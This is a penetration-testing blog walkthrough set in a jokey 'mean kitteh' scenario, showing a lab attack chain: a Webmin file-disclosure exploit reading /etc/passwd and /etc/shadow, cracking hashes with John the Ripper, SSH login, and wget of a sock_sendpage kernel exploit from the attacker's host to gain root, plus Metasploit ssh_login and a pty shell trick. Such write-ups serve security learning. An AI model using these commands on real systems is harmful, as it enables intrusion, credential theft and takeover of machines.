Webmin + John = root!

I wanted to do something different this week, however the video I recorded crashed and didnt save correctly. sniffles I will attempt to do a video this weekend since I have some extra time and get it uploaded for next week. I still wanted to do something, so I was going through some of my old notes and decided to write about an oldie but goodie.

Scenario:
I was approached by a mean kitteh. He said that if we can hack into his box, we can have all the beers we want. However, he said that if we cannot hack into his box, he will eat our faces and piss on our favorite Batman Chucks!! 🙁 Since I love beer, I figured why not.

After scanning the kitteh’s network, I came across the following port open on a host:

Webmin on default port

I wanted to make sure I could reach the victim on that port by visiting the IP:PORT in our browser. Since, my other scans were not completed yet, I went to the Googles!! However, if I previously scanned the victim with hydra or nessus, etc… Maybe I was lucky enough to find weak passwords. If that is the case, game is pretty much over, depending on how webmin was installed.

default

As you can see from the screenshot, webmin is running with root permissions, so we can execute any command that we want. However, if you aren’t that lucky. Extra research can come in handy. I have identified that this version of webmin has a flaw that will allow us to retrieve files from the local system. This could come in handy! Of course, you can easily search the Internet and find many exploits or ways to hack this version of Webmin.

Now that we have done our research and have found a promising exploit. Lets get to work!!!

perl

Ok, from the exploit we see that the default vaules are:

url - victim url/ip
port - in most cases the default is "10000"
filename - the name of the file you are looking to retrieve
target - whether the victim uses HTTP or HTTPS

That seems simple enough. The easiest thing to do is to attempt to retrieve the “/etc/passwd” file; as this file should be “world” accessible this is a good first test.

pass

Awesome, looks like we can read the “/etc/passwd” file. Lets see if we can read any other files, like the “/etc/shadow” file. 😉 YAY! we can read that file as well. Lets save them to a file in preparation for our next step with john.

root@L4mers3c:~# perl 2017.pl 192.168.160.156 10000 /etc/passwd 0 > passwd.txt

root@L4mers3c:~# perl 2017.pl 192.168.160.156 10000 /etc/shadow 0 > shadow.txt

You may have to clean up the output a little.

Now that we have both files saved, we can use a cool utility that comes along with John the Ripper (JTR) called “unshadow”. Unshadow will take an “/etc/passwd” file and merge it with an “/etc/shadow” file and hopefully allow us to crack the passwords. Of course this depends on how secure and complex the kittehs passwords are.

root@L4mers3c:~# unshadow passwd.txt shadow.txt > both.txt

Now that both files are merged, we can attempt to crack them with JTR.

john

As you can see we have cracked some of the really weak passwords. hmmm! During scanning I noticed that SSH was running on this host. Lets see if we can login with one of the accounts that we have found.

ssh

Game Over!! Well not really, if we look at our user permissions, we arent root! The kitteh said we cannot have a beer until we get root. We can go through the normal post exploitation steps and look for a local exploit.

[l4mers3c@localhost ~]$ uname -a
Linux localhost.localdomain 2.6.18-128.el5 #1 SMP Wed Jan 21 10:44:23 EST 2009 i686 i686 i386 GNU/Linux
[l4mers3c@localhost ~]$

After searching on the Interwebz, we find that our victim is potentially vulnerable to the “Linux sock_sendpage() NULL pointer dereference” exploit. Lets move it over to our victim and see what we can do.

root@L4mers3c:~# service apache2 start
[ ok ] Starting web server: apache2.
root@L4mers3c:~# searchsploit sock
Linux Kernel <= 2.6.3 (setsockopt) Local Denial of Service Exploit /linux/dos/274.c
XChat 1.8.0/2.0.8 socks5 Remote Buffer overflow Exploit /linux/remote/296.c
Codename Eagle <= 1.42 Socket Unreacheable DoS Exploit /windows/dos/682.c
Lithtech Engine (new protocol) Socket Unreacheable DoS /windows/dos/683.c
Gore <= 1.50 Socket Unreacheable Denial of Service Exploit /windows/dos/742.c
Newspost 2.1 socket_getline() Remote Buffer Overflow Exploit v2 /linux/remote/785.c
Solaris SPARC / x86 Local Socket Hijack Exploit /solaris/local/1092.c
<snip>

Ok, we locate the exploit. Now we can copy it to our default web directory and then “wget” it from our victim machine.

root@L4mers3c:~# cp /usr/share/exploitdb/platforms/linux/local/9545.c /var/www/

Note: As always, I do everything in the “/tmp” directory, so make sure you are in that directoy on the victim.

[l4mers3c@localhost tmp]$ wget http://192.168.160.159/9545.c

Now lets compile it and run it.

[l4mers3c@localhost tmp]$ gcc -o sock 9545.c
[l4mers3c@localhost tmp]$ ./sock
sh-3.2# id
uid=0(root) gid=0(root) groups=500(l4mers3c)
sh-3.2# /bin/bash
[root@localhost tmp]#

BAM we are root! Now we can change the password or add our ssh key to the victim. As promised,kitteh says we can have our beer.

beer

You can also use metasploit’s “SSH-Login” utility and then follow the same procedures.

msf> use auxiliary/scanner/ssh/ssh_login
msf auxiliary(ssh_login) > set USERNAME l4mers3c
USERNAME => l4mers3c
msf auxiliary(ssh_login) > set STOP_ON_SUCCESS true
STOP_ON_SUCCESS => true
msf auxiliary(ssh_login) > set VERBOSE false
VERBOSE => false
msf auxiliary(ssh_login) > run -j
msf auxiliary(ssh_login) >
[] Command shell session 2 opened (192.168.160.159:33277 -> 192.168.160.156:22) at 2013-10-09 22:39:49 -0400
[+] 192.168.160.156:22 SSH - [3/3] - Success: 'l4mers3c':'password' 'uid=500(l4mers3c) gid=500(l4mers3c) groups=500(l4mers3c) Linux localhost.localdomain 2.6.18-128.el5 #1 SMP Wed Jan 21 10:44:23 EST 2009 i686 i686 i386 GNU/Linux '
[
] Scanned 1 of 1 hosts (100% complete)
msf auxiliary(ssh_login) > sessions -i 2
[*] Starting interaction with 2...
id
uid=500(l4mers3c) gid=500(l4mers3c) groups=500(l4mers3c)

If you want a prompt, we can use the old “pty” trick.

python -c 'import pty;pty.spawn("/bin/bash")'
[l4mers3c@localhost ~]$

Then you can attempt to use the local linux exploits in MSF to get root or download the file to the tmp dir like we did earlier.

Until next time!!!

Leave a Reply